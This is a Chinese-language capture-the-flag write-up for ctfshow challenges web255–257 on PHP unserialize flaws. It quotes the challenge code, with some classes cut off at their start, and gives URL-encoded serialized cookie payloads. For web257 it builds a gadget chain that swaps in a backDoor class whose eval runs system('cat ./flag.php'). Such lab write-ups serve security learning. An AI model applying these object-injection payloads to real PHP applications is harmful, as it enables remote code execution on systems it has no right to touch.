目录
web255
web256
web257
web255附代码
isVip;
}
public function login($u,$p){
return $this->username===$u&&$this->password===$p;
}
public function vipOneKeyGetFlag(){
if($this->isVip){
global $flag;
echo "your flag is ".$flag;
}else{
echo "no vip, no flag";
}
}
}
$username=$_GET['username'];
$password=$_GET['password'];
if(isset($username) && isset($password)){
$user = unserialize($_COOKIE['user']);
if($user->login($username,$password)){
if($user->checkVip()){
$user->vipOneKeyGetFlag();
}
}else{
echo "no vip,no flag";
}
}
整体的思路和上一题差不多只是多了一句
$user = unserialize($_COOKIE['user']);
可以看到unserialize就是反序列化,所以需要我们序列化一些东西,通过cookie的user变量传入,改变这个数据。
public function login($u,$p){
return $this->username===$u&&$this->password===$p;
这段代码无法让isVip为true,所以我们就需要通过user这个变量改变isVip的值。
直接把类拿过来,只有类和变量会被反序列化,其他都可以去掉。
所以参入参数就是
拿到flag,债见!!
web256附代码
isVip;
}
public function login($u,$p){
return $this->username===$u&&$this->password===$p;
}
public function vipOneKeyGetFlag(){
if($this->isVip){
global $flag;
if($this->username!==$this->password){
echo "your flag is ".$flag;
}
}else{
echo "no vip, no flag";
}
}
}
$username=$_GET['username'];
$password=$_GET['password'];
if(isset($username) && isset($password)){
$user = unserialize($_COOKIE['user']);
if($user->login($username,$password)){
if($user->checkVip()){
$user->vipOneKeyGetFlag();
}
}else{
echo "no vip,no flag";
}
}
这个题的关键点在于username和password不相等,因为都是强比较,所以我们传入的username和password值不同即可,这时候注意cookie中参入的user的username和password也要改
所以我们这时候传入的应该是
?username=1&password=2
O%3A11%3A%22ctfShowUser%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22password%22%3Bs%3A1%3A%222%22%3Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D
拿到flag,债见!
web257附代码
class=new info();
}
public function login($u,$p){
return $this->username===$u&&$this->password===$p;
}
public function __destruct(){
$this->class->getInfo();
}
}
class info{
private $user='xxxxxx';
public function getInfo(){
return $this->user;
}
}
class backDoor{
private $code;
public function getInfo(){
eval($this->code);
}
}
$username=$_GET['username'];
$password=$_GET['password'];
if(isset($username) && isset($password)){
$user = unserialize($_COOKIE['user']);
$user->login($username,$password);
}
这个题开始涉及反序列化的魔术方法了,我前面有文章写过php反序列化常用魔术方法的介绍
我们看回这个题,最后我们要用到的是backDoor类中的eval函数,来执行命令
结合上一个题的方法,循序渐进的看这个题,construct方法在初始化一个类的时候被触发,这里的construct方法会初始化info()这个类,在销毁时候触发destruct方法,destruct方法触发会调用info()类中的getInfo方法,然后返回user对象的值,这里我们看到我们想要调用的backDoor类中的方法也叫getInfo(),所以我们可以在序列化的时候把__construct方法初始化的类从info改为backDoor。
具体的实施方法如下:
class=new backDoor();
}
public function login($u,$p){
return $this->username===$u&&$this->password===$p;
}
public function __destruct(){
$this->class->getInfo();
}
}
class backDoor{
private $code='system("cat ./flag.php");';
public function getInfo(){
eval($this->code);
}
}
echo(urlencode(serialize(new ctfShowUser())));
还是老规矩
?username=xxxxxx&password=xxxxxx
Cookie: user=O%3A11%3A%22ctfShowUser%22%3A4%3A%7Bs%3A21%3A%22%00ctfShowUser%00username%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A21%3A%22%00ctfShowUser%00password%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A18%3A%22%00ctfShowUser%00isVip%22%3Bb%3A1%3Bs%3A18%3A%22%00ctfShowUser%00class%22%3BO%3A8%3A%22backDoor%22%3A1%3A%7Bs%3A14%3A%22%00backDoor%00code%22%3Bs%3A25%3A%22system%28%22cat+.%2Fflag.php%22%29%3B%22%3B%7D%7D
拿到flag,债见!!
